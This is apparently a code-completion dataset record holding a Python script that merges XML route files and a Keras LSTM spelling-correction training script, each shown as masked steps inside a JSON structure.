root6 = rutas90k_110k.getroot()
rootsToAdd = [root2, root3, root4, root5, root6]
for root in rootsToAdd:
for elem in root:
root1.append(elem)
rutas0k_10k.write('rutas/rutas0k-110k.xml')
<|reserved_special_token_1|>
import xml.etree.ElementTree as ET
rutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')
rutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')
rutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')
rutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')
rutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')
rutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')
root1 = rutas0k_10k.getroot()
root2 = rutas10k_30k.getroot()
root3 = rutas30k_50k.getroot()
root4 = rutas50k_70k.getroot()
root5 = rutas70k_90k.getroot()
root6 = rutas90k_110k.getroot()
rootsToAdd = [root2, root3, root4, root5, root6]
for root in rootsToAdd:
for elem in root:
root1.append(elem)
rutas0k_10k.write('rutas/rutas0k-110k.xml')
<|reserved_special_token_1|>
import xml.etree.ElementTree as ET
#tree = ET.parse('rutas/rutas_prueba.xml')
#treeToAdd = ET.parse('rutas/rutas_prueba_agregar.xml')
#root = tree.getroot()
#git rootToAdd = treeToAdd.getroot()
#for child in root:
# for test in child:
# print(test.tag, test.attrib)
#for elem in root.iter():
# print(elem.tag)
#prueba = [elem.tag for elem in root.iter()]
#print(prueba)
#print(ET.tostring(root, encoding='utf8').decode('utf8'))
# for elem in rootToAdd:
# root.append(elem)
#
# tree.write('rutas/probando_agregados.xml')
#get the tree for each routes file
rutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')
rutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')
rutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')
rutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')
rutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')
rutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')
#root for each routes tree
root1 = rutas0k_10k.getroot()
root2 = rutas10k_30k.getroot()
root3 = rutas30k_50k.getroot()
root4 = rutas50k_70k.getroot()
root5 = rutas70k_90k.getroot()
root6 = rutas90k_110k.getroot()
#each root except first root
rootsToAdd = [root2,root3,root4,root5,root6]
#add each element to the first tree
for root in rootsToAdd:
for elem in root:
root1.append(elem)
#write the tree to a new file
rutas0k_10k.write('rutas/rutas0k-110k.xml')
|
flexible
|
{
"blob_id": "b4b7e20c9558bd1b29a1c1fa24bfca8a2d292b27",
"index": 398,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n",
"step-3": "<mask token>\nrutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')\nrutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')\nrutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')\nrutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')\nrutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')\nrutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')\nroot1 = rutas0k_10k.getroot()\nroot2 = rutas10k_30k.getroot()\nroot3 = rutas30k_50k.getroot()\nroot4 = rutas50k_70k.getroot()\nroot5 = rutas70k_90k.getroot()\nroot6 = rutas90k_110k.getroot()\nrootsToAdd = [root2, root3, root4, root5, root6]\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n",
"step-4": "import xml.etree.ElementTree as ET\nrutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')\nrutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')\nrutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')\nrutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')\nrutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')\nrutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')\nroot1 = rutas0k_10k.getroot()\nroot2 = rutas10k_30k.getroot()\nroot3 = rutas30k_50k.getroot()\nroot4 = rutas50k_70k.getroot()\nroot5 = rutas70k_90k.getroot()\nroot6 = rutas90k_110k.getroot()\nrootsToAdd = [root2, root3, root4, root5, root6]\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n",
"step-5": "import xml.etree.ElementTree as ET\n\n#tree = ET.parse('rutas/rutas_prueba.xml')\n#treeToAdd = ET.parse('rutas/rutas_prueba_agregar.xml')\n\n#root = tree.getroot()\n\n#git rootToAdd = treeToAdd.getroot()\n\n#for child in root:\n# for test in child:\n# print(test.tag, test.attrib)\n\n\n#for elem in root.iter():\n# print(elem.tag)\n\n#prueba = [elem.tag for elem in root.iter()]\n#print(prueba)\n#print(ET.tostring(root, encoding='utf8').decode('utf8'))\n\n# for elem in rootToAdd:\n# root.append(elem)\n#\n# tree.write('rutas/probando_agregados.xml')\n\n#get the tree for each routes file\nrutas0k_10k = ET.parse('rutas/rutas0k-10k.xml')\nrutas10k_30k = ET.parse('rutas/rutas10k-30k.xml')\nrutas30k_50k = ET.parse('rutas/rutas30k-50k.xml')\nrutas50k_70k = ET.parse('rutas/rutas50k-70k.xml')\nrutas70k_90k = ET.parse('rutas/rutas70k-90k.xml')\nrutas90k_110k = ET.parse('rutas/rutas90k-110k.xml')\n\n#root for each routes tree\nroot1 = rutas0k_10k.getroot()\nroot2 = rutas10k_30k.getroot()\nroot3 = rutas30k_50k.getroot()\nroot4 = rutas50k_70k.getroot()\nroot5 = rutas70k_90k.getroot()\nroot6 = rutas90k_110k.getroot()\n\n#each root except first root\nrootsToAdd = [root2,root3,root4,root5,root6]\n\n#add each element to the first tree\nfor root in rootsToAdd:\n for elem in root:\n root1.append(elem)\n\n#write the tree to a new file\nrutas0k_10k.write('rutas/rutas0k-110k.xml')\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
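The step-5 script in the record above repeats the parse/getroot pair six times; the sketch below is an equivalent merge written as a loop over the same input paths. It is an illustrative refactor that produces the same output file, not part of the original blob.

# Equivalent merge written as a loop over the input paths (illustrative refactor).
import xml.etree.ElementTree as ET

ranges = [(0, 10), (10, 30), (30, 50), (50, 70), (70, 90), (90, 110)]
paths = [f'rutas/rutas{a}k-{b}k.xml' for a, b in ranges]

base_tree = ET.parse(paths[0])
base_root = base_tree.getroot()
for path in paths[1:]:
    for elem in ET.parse(path).getroot():
        base_root.append(elem)

base_tree.write('rutas/rutas0k-110k.xml')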
<|reserved_special_token_0|>
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
def main_news(checkpoint_filename=None, dataset_params_filename=None,
initial_epoch=1):
"""Main"""
dataset = DataSet(DATASET_FILENAME)
if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):
os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)
if dataset_params_filename is not None:
with open(dataset_params_filename, 'rb') as f:
dataset_params = pickle.load(f)
assert dataset_params['chars'] == dataset.chars
assert dataset_params['y_max_length'] == dataset.y_max_length
else:
save_dataset_params(dataset)
model = generate_model(dataset.y_max_length, dataset.chars)
if checkpoint_filename is not None:
model.load_weights(checkpoint_filename)
iterate_training(model, dataset, initial_epoch)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
random_seed(123)
DATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'
NUMBER_OF_EPOCHS = 100000
RNN = recurrent.LSTM
INPUT_LAYERS = 2
OUTPUT_LAYERS = 2
AMOUNT_OF_DROPOUT = 0.3
BATCH_SIZE = 32
SAMPLES_PER_EPOCH = 65536
HIDDEN_SIZE = 700
INITIALIZATION = 'he_normal'
NUMBER_OF_CHARS = 100
CHARS = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .')
INVERTED = True
MODEL_CHECKPOINT_DIRECTORYNAME = 'models'
MODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'
MODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'
MODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'
CSV_LOG_FILENAME = 'log.csv'
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)
), init=INITIALIZATION, return_sequences=layer_number + 1 <
INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(RepeatVector(output_len))
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=
INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\x1b[92m'
fail = '\x1b[91m'
close = '\x1b[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([
ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1])
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else
Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_CHECKPOINT_FILENAME, save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:
show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator, samples_per_epoch=
SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=
validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger,
show_samples_callback], verbose=1, initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = {'chars': dataset.chars, 'y_max_length': dataset.y_max_length}
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +
MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
def main_news(checkpoint_filename=None, dataset_params_filename=None,
initial_epoch=1):
"""Main"""
dataset = DataSet(DATASET_FILENAME)
if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):
os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)
if dataset_params_filename is not None:
with open(dataset_params_filename, 'rb') as f:
dataset_params = pickle.load(f)
assert dataset_params['chars'] == dataset.chars
assert dataset_params['y_max_length'] == dataset.y_max_length
else:
save_dataset_params(dataset)
model = generate_model(dataset.y_max_length, dataset.chars)
if checkpoint_filename is not None:
model.load_weights(checkpoint_filename)
iterate_training(model, dataset, initial_epoch)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description=
'Trains a deep spelling model.')
parser.add_argument('--checkpoint', type=str, help=
'Filename of a model checkpoint to start the training from.')
parser.add_argument('--datasetparams', type=str, help=
'Filename of a file with dataset params to load for continuing model training.'
)
parser.add_argument('--initialepoch', type=int, help=
'Initial epoch parameter for continuing model training.', default=0)
args = parser.parse_args()
main_news(args.checkpoint, args.datasetparams, args.initialepoch)
<|reserved_special_token_1|>
# encoding: utf-8
'''
Created on Nov 26, 2015
@author: tal
Based in part on:
Learn math - https://github.com/fchollet/keras/blob/master/examples/addition_rnn.py
See https://medium.com/@majortal/deep-spelling-9ffef96a24f6#.2c9pu8nlm
"""
Modified by Pavel Surmenok
'''
import argparse
import numpy as np
from keras.layers import Activation, TimeDistributed, Dense, RepeatVector, Dropout
from keras.layers import recurrent
from keras.models import Sequential
from keras.callbacks import ModelCheckpoint, TensorBoard, CSVLogger, LambdaCallback
from numpy.random import seed as random_seed
from numpy.random import randint as random_randint
import os
import pickle
from data import DataSet
random_seed(123) # Reproducibility
# Parameters for the model and dataset
DATASET_FILENAME = 'data/dataset/news.2011.en.shuffled'
NUMBER_OF_EPOCHS = 100000
RNN = recurrent.LSTM
INPUT_LAYERS = 2
OUTPUT_LAYERS = 2
AMOUNT_OF_DROPOUT = 0.3
BATCH_SIZE = 32
SAMPLES_PER_EPOCH = 65536
HIDDEN_SIZE = 700
INITIALIZATION = "he_normal" # : Gaussian initialization scaled by fan_in (He et al., 2014)
NUMBER_OF_CHARS = 100 # 75
CHARS = list("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ .")
INVERTED = True
MODEL_CHECKPOINT_DIRECTORYNAME = 'models'
MODEL_CHECKPOINT_FILENAME = 'weights.{epoch:02d}-{val_loss:.2f}.hdf5'
MODEL_DATASET_PARAMS_FILENAME = 'dataset_params.pickle'
MODEL_STARTING_CHECKPOINT_FILENAME = 'weights.hdf5'
CSV_LOG_FILENAME = 'log.csv'
def generate_model(output_len, chars=None):
"""Generate the model"""
print('Build model...')
chars = chars or CHARS
model = Sequential()
# "Encode" the input sequence using an RNN, producing an output of HIDDEN_SIZE
# note: in a situation where your input sequences have a variable length,
# use input_shape=(None, nb_feature).
for layer_number in range(INPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)), init=INITIALIZATION,
return_sequences=layer_number + 1 < INPUT_LAYERS))
model.add(Dropout(AMOUNT_OF_DROPOUT))
# For the decoder's input, we repeat the encoded input for each time step
model.add(RepeatVector(output_len))
# The decoder RNN could be multiple layers stacked or a single layer
for _ in range(OUTPUT_LAYERS):
model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=INITIALIZATION))
model.add(Dropout(AMOUNT_OF_DROPOUT))
# For each of step of the output sequence, decide which character should be chosen
model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
return model
class Colors(object):
"""For nicer printouts"""
ok = '\033[92m'
fail = '\033[91m'
close = '\033[0m'
def show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):
"""Selects 10 samples from the dev set at random so we can visualize errors"""
for _ in range(10):
ind = random_randint(0, len(X_dev_batch))
row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([ind])]
preds = model.predict_classes(row_X, verbose=0)
q = dataset.character_table.decode(row_X[0])
correct = dataset.character_table.decode(row_y[0])
guess = dataset.character_table.decode(preds[0], calc_argmax=False)
if INVERTED:
print('Q', q[::-1]) # inverted back!
else:
print('Q', q)
print('A', correct)
print(Colors.ok + '☑' + Colors.close if correct == guess else Colors.fail + '☒' + Colors.close, guess)
print('---')
def iterate_training(model, dataset, initial_epoch):
"""Iterative Training"""
checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_CHECKPOINT_FILENAME,
save_best_only=True)
tensorboard = TensorBoard()
csv_logger = CSVLogger(CSV_LOG_FILENAME)
X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))
show_samples_callback = LambdaCallback(
on_epoch_end=lambda epoch, logs: show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))
train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)
validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)
model.fit_generator(train_batch_generator,
samples_per_epoch=SAMPLES_PER_EPOCH,
nb_epoch=NUMBER_OF_EPOCHS,
validation_data=validation_batch_generator,
nb_val_samples=SAMPLES_PER_EPOCH,
callbacks=[checkpoint, tensorboard, csv_logger, show_samples_callback],
verbose=1,
initial_epoch=initial_epoch)
def save_dataset_params(dataset):
params = { 'chars': dataset.chars, 'y_max_length': dataset.y_max_length }
with open(MODEL_CHECKPOINT_DIRECTORYNAME + '/' + MODEL_DATASET_PARAMS_FILENAME, 'wb') as f:
pickle.dump(params, f)
def main_news(checkpoint_filename=None, dataset_params_filename=None, initial_epoch=1):
"""Main"""
dataset = DataSet(DATASET_FILENAME)
if not os.path.exists(MODEL_CHECKPOINT_DIRECTORYNAME):
os.makedirs(MODEL_CHECKPOINT_DIRECTORYNAME)
if dataset_params_filename is not None:
with open(dataset_params_filename, 'rb') as f:
dataset_params = pickle.load(f)
assert dataset_params['chars'] == dataset.chars
assert dataset_params['y_max_length'] == dataset.y_max_length
else:
save_dataset_params(dataset)
model = generate_model(dataset.y_max_length, dataset.chars)
if checkpoint_filename is not None:
model.load_weights(checkpoint_filename)
iterate_training(model, dataset, initial_epoch)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Trains a deep spelling model.')
parser.add_argument('--checkpoint', type=str,
help='Filename of a model checkpoint to start the training from.')
parser.add_argument('--datasetparams', type=str,
help='Filename of a file with dataset params to load for continuing model training.')
parser.add_argument('--initialepoch', type=int,
help='Initial epoch parameter for continuing model training.', default=0)
args = parser.parse_args()
main_news(args.checkpoint, args.datasetparams, args.initialepoch)
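
# Example invocation for resuming training (illustrative; the script filename,
# paths and epoch number are assumptions, while the flags match the argparse
# definitions above):
#   python train.py --checkpoint models/weights.hdf5 \
#       --datasetparams models/dataset_params.pickle --initialepoch 10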
|
flexible
|
{
"blob_id": "572a098053ebae4f42cd020d1003cc18eceb6af0",
"index": 4984,
"step-1": "<mask token>\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = '\\x1b[0m'\n\n\ndef show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch):\n \"\"\"Selects 10 samples from the dev set at random so we can visualize errors\"\"\"\n for _ in range(10):\n ind = random_randint(0, len(X_dev_batch))\n row_X, row_y = X_dev_batch[np.array([ind])], y_dev_batch[np.array([\n ind])]\n preds = model.predict_classes(row_X, verbose=0)\n q = dataset.character_table.decode(row_X[0])\n correct = dataset.character_table.decode(row_y[0])\n guess = dataset.character_table.decode(preds[0], calc_argmax=False)\n if INVERTED:\n print('Q', q[::-1])\n else:\n print('Q', q)\n print('A', correct)\n print(Colors.ok + '☑' + Colors.close if correct == guess else \n Colors.fail + '☒' + Colors.close, guess)\n print('---')\n\n\ndef iterate_training(model, dataset, initial_epoch):\n \"\"\"Iterative Training\"\"\"\n checkpoint = ModelCheckpoint(MODEL_CHECKPOINT_DIRECTORYNAME + '/' +\n MODEL_CHECKPOINT_FILENAME, save_best_only=True)\n tensorboard = TensorBoard()\n csv_logger = CSVLogger(CSV_LOG_FILENAME)\n X_dev_batch, y_dev_batch = next(dataset.dev_set_batch_generator(1000))\n show_samples_callback = LambdaCallback(on_epoch_end=lambda epoch, logs:\n show_samples(model, dataset, epoch, logs, X_dev_batch, y_dev_batch))\n train_batch_generator = dataset.train_set_batch_generator(BATCH_SIZE)\n validation_batch_generator = dataset.dev_set_batch_generator(BATCH_SIZE)\n model.fit_generator(train_batch_generator, samples_per_epoch=\n SAMPLES_PER_EPOCH, nb_epoch=NUMBER_OF_EPOCHS, validation_data=\n validation_batch_generator, nb_val_samples=SAMPLES_PER_EPOCH,\n callbacks=[checkpoint, tensorboard, csv_logger,\n show_samples_callback], verbose=1, initial_epoch=initial_epoch)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef generate_model(output_len, chars=None):\n \"\"\"Generate the model\"\"\"\n print('Build model...')\n chars = chars or CHARS\n model = Sequential()\n for layer_number in range(INPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, input_shape=(None, len(chars)\n ), init=INITIALIZATION, return_sequences=layer_number + 1 <\n INPUT_LAYERS))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(RepeatVector(output_len))\n for _ in range(OUTPUT_LAYERS):\n model.add(recurrent.LSTM(HIDDEN_SIZE, return_sequences=True, init=\n INITIALIZATION))\n model.add(Dropout(AMOUNT_OF_DROPOUT))\n model.add(TimeDistributed(Dense(len(chars), init=INITIALIZATION)))\n model.add(Activation('softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam',\n metrics=['accuracy'])\n return model\n\n\nclass Colors(object):\n \"\"\"For nicer printouts\"\"\"\n ok = '\\x1b[92m'\n fail = '\\x1b[91m'\n close = 